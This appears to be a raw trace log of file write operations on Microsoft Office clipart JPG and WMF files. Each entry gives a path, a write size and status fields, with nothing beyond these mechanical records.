Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185778.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185798.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186360.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186362.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187849.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187859.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187893.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187895.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187921.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188511.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188519.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188679.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195772.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198113.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198712.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199303.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199423.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199465.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199469.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199473.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199483.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199609.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200151.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200163.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200183.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200189.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200279.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200289.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200383.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200611.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212751.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213243.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213449.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214934.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215210.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215709.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215710.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215718.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216540.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216600.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216612.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216874.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217262.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217302.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228823.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228959.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230558.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232171.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232393.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232395.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232797.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232803.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233665.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234000.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234376.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237225.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237759.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238333.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238927.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238959.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239057.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239079.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239611.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239941.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239955.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239965.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239967.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239973.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239997.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240291.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241037.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241043.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241077.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241773.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250504.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250997.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF size = 186 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252629.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252669.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281008.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281632.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281640.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282928.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285484.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285782.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285792.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285796.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285808.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285820.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287018.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287019.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287024.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287408.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0290548.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292272.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292286.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293800.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293832.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296277.WMF size = 1 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF size = 1268 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF size = 1 True 2
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF size = 1024 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF size = 4 True 3
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF size = 187 True 1
Fn
Data
Write C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF size = 1268 True 1
Fn
Data
